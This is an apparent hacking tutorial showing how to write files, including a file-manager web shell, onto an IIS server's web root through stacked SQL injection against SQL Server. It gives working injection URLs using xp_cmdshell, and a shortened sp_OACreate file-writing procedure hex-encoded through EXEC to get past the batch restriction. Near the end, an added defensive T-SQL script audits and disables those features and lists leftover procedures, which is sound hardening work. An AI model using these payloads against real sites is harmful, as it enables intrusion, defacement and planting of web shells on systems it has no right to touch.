In the Name of ALLAH the most beneficent and the Merciful
Uploading files to an IIS server through SQL injection, even when the database user is an admin and we know the web root path, used to seem impossible to me. There are ways to write files with xp_cmdshell, but it is not enabled on every SQL Server, for security reasons, and it is not enabled by default. After I read these articles
- https://www.simple-talk.com/sql/t-sql-programming/reading-and-writing-files-in-sql-server-using-t-sql/
- http://msdn.microsoft.com/en-us/library/aa711216(v=vs.71).aspx
I learned that there is a way to write files even when xp_cmdshell is not enabled. In this article I will show you both ways of writing files.
1. With xp_cmdshell
It is pretty easy when you have access to xp_cmdshell.
First, create the file with:
site.com/page.aspx?id=1;exec master..xp_cmdshell 'type nul>path/filename.ext'-- -
e.g.
site.com/page.aspx?id=1;exec master..xp_cmdshell 'type NUL>D:\sites\site.com\httpdocs\rummykhan.txt'-- -
This creates an empty file. Now we need to write contents into it:
site.com/page.aspx?id=1;exec master..xp_cmdshell 'echo rummykhan was here!!>D:\sites\site.com\httpdocs\rummykhan.txt'-- -
And you're done; the file is written on the server.
2. With File System Objects
Here is the complete procedure code which I used as the starting point:
- https://www.simple-talk.com/code/WorkingWithFiles/spWriteStringTofile.txt (by Phil Factor)
I customized it for my needs to avoid the URL length problem, and it became the shortened version below.
CREATE PROCEDURE FcUk(@st Varchar(max), @p VARCHAR(255), @fn VARCHAR(100)) AS
DECLARE @ofs int, @ots int, @oeo int, @sem Varchar(1000), @cmd varchar(1000), @hr int, @fnp varchar(80)
set nocount on
select @sem = 'o'
-- create the FileSystemObject COM object
EXECUTE @hr = sp_OACreate 'Scripting.FileSystemObject', @ofs OUT
-- full path = directory + '\' + file name
Select @fnp = @p + '\' + @fn
if @HR = 0 Select @oeo = @ofs, @sem = 'Creating file "' + @fnp + '"'
-- CreateTextFile(path, overwrite, unicode) returns a TextStream in @ots
if @HR = 0 execute @hr = sp_OAMethod @ofs, 'CreateTextFile', @ots OUT, @fnp, 2, True
if @HR = 0 Select @oeo = @ots, @sem = 'wttf "' + @fnp + '"'
-- write the string and close the stream
if @HR = 0 execute @hr = sp_OAMethod @ots, 'Write', Null, @st
if @HR = 0 Select @oeo = @ots, @sem = 'ctf "' + @fnp + '"'
if @HR = 0 execute @hr = sp_OAMethod @ots, 'Close'
if @hr <> 0 begin
  Declare @Source varchar(255), @Description Varchar(255), @Helpfile Varchar(255), @HelpID int
  EXECUTE sp_OAGetErrorInfo @oeo, @source output, @Description output, @Helpfile output, @HelpID output
end
-- release both COM objects (the stream and the file system object)
EXECUTE sp_OADestroy @ots
EXECUTE sp_OADestroy @ofs
I just cut short the variable names and removed the error-message text, because we don't need those during injection.
At first, when testing, I wrote the same proc directly in the URL, like
site.com/page.aspx?id=1;proc syntax here-- -
and got: 'CREATE/ALTER PROCEDURE' must be the first statement in a query batch.
This is due to a restriction in T-SQL: CREATE PROC must be the first statement when you execute a batch of queries.
So to avoid this I used EXEC(): I hex encoded the complete proc, passed it as EXEC('complete proc in hex'), and voila, it worked like a charm and created the stored procedure on the SQL Server.
Here is the final syntax for creating the stored procedure on the SQL Server. I hex encoded it to avoid any exception from SQL Server about quotation marks and to run things smoothly.
begin
declare @x varchar(MAX)
SET @x = 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;
EXEC(@x)
end
And we can use it like
site.com/page.aspx?id=1;above syntax here-- -
The above query will create a stored procedure named FcUk which takes 3 parameters:
1. File Contents
2. Full Path
3. File Name
Now the next thing is to execute that proc:
site.com/page.aspx?id=1; exec FcUk 'file contents here.','Full path','file name'-- -
e.g.
site.com/page.aspx?id=1; exec FcUk 'rummykhan was here!!','D:\sites\site.com\httpdocs\','rummykhan.txt'-- -
Now access the file and enjoy.
A tiny uploader to avoid the URL length problem:
begin
declare @x varchar(MAX)
SET @x = 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
exec FcUk @x, 'path here', 'filename'
end
Use this syntax like
site.com/page.aspx?id=1;above uploader syntax here-- -
and access it and upload your file manager.
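Both techniques above depend on instance options that are off by default: xp_cmdshell, and, for sp_OACreate, the 'Ole Automation Procedures' option; both also need sysadmin-level rights, which is why the article assumes the injected user is admin. The following is an added defender-side T-SQL script, not code from the article or from Phil Factor's procedure. It reports whether either option is on, hunts the plan cache for batches that called them, lists procedures recently created in the application database (the technique leaves one behind, named FcUk in this article), and turns both options off. The database name [AppDb] is a placeholder assumption.

```sql
-- Added defensive audit/hardening script (not part of the original article).
-- Run as sysadmin on an instance you administer. [AppDb] is a placeholder
-- for the application's database; 'FcUk' is the procedure name from the article.
USE master;
GO

-- 1. Report the two surfaces the article relies on. value_in_use = 1 means enabled.
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures');

-- 2. Hunt the plan cache for batch text that called either surface.
--    The string passed to EXEC() gets its own cached entry, so the hex-decoded
--    CREATE PROCEDURE batch shows up here too. Only uncached/evicted entries are missed.
SELECT TOP (50) qs.last_execution_time, qs.execution_count, st.text
FROM sys.dm_exec_query_stats AS qs
CROSS APPLY sys.dm_exec_sql_text(qs.sql_handle) AS st
WHERE st.text LIKE '%xp_cmdshell%'
   OR st.text LIKE '%sp_OACreate%'
ORDER BY qs.last_execution_time DESC;

-- 3. Procedures recently created in the application database; the technique
--    leaves one behind. Disabling the options below does not remove it.
SELECT name, create_date, modify_date
FROM [AppDb].sys.procedures
ORDER BY create_date DESC;
-- After confirming it is not legitimate:
-- DROP PROCEDURE [AppDb].dbo.FcUk;

-- 4. Harden: turn both options off. They are advanced options, so
--    'show advanced options' must be on while changing them.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
EXEC sp_configure 'Ole Automation Procedures', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

-- 5. Enabled logins holding sysadmin, the precondition for everything above.
--    The web application's login should not be in this list.
SELECT sp.name, sp.type_desc
FROM sys.server_principals AS sp
WHERE IS_SRVROLEMEMBER('sysadmin', sp.name) = 1
  AND sp.is_disabled = 0;
```

Run it from SSMS or sqlcmd as sysadmin. Step 2 is only a quick triage; the plan cache is cleared on restart, so a SQL Server Audit or Extended Events session is needed for durable evidence. The lasting fix is in the web application: the injectable id parameter in page.aspx must be parameterized, and the application's login should hold only the database permissions it needs rather than sysadmin.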
POC
Original Video : http://youtu.be/DtWRQG0BaMI
Article By : Rummy Khan (fb/rummykhan)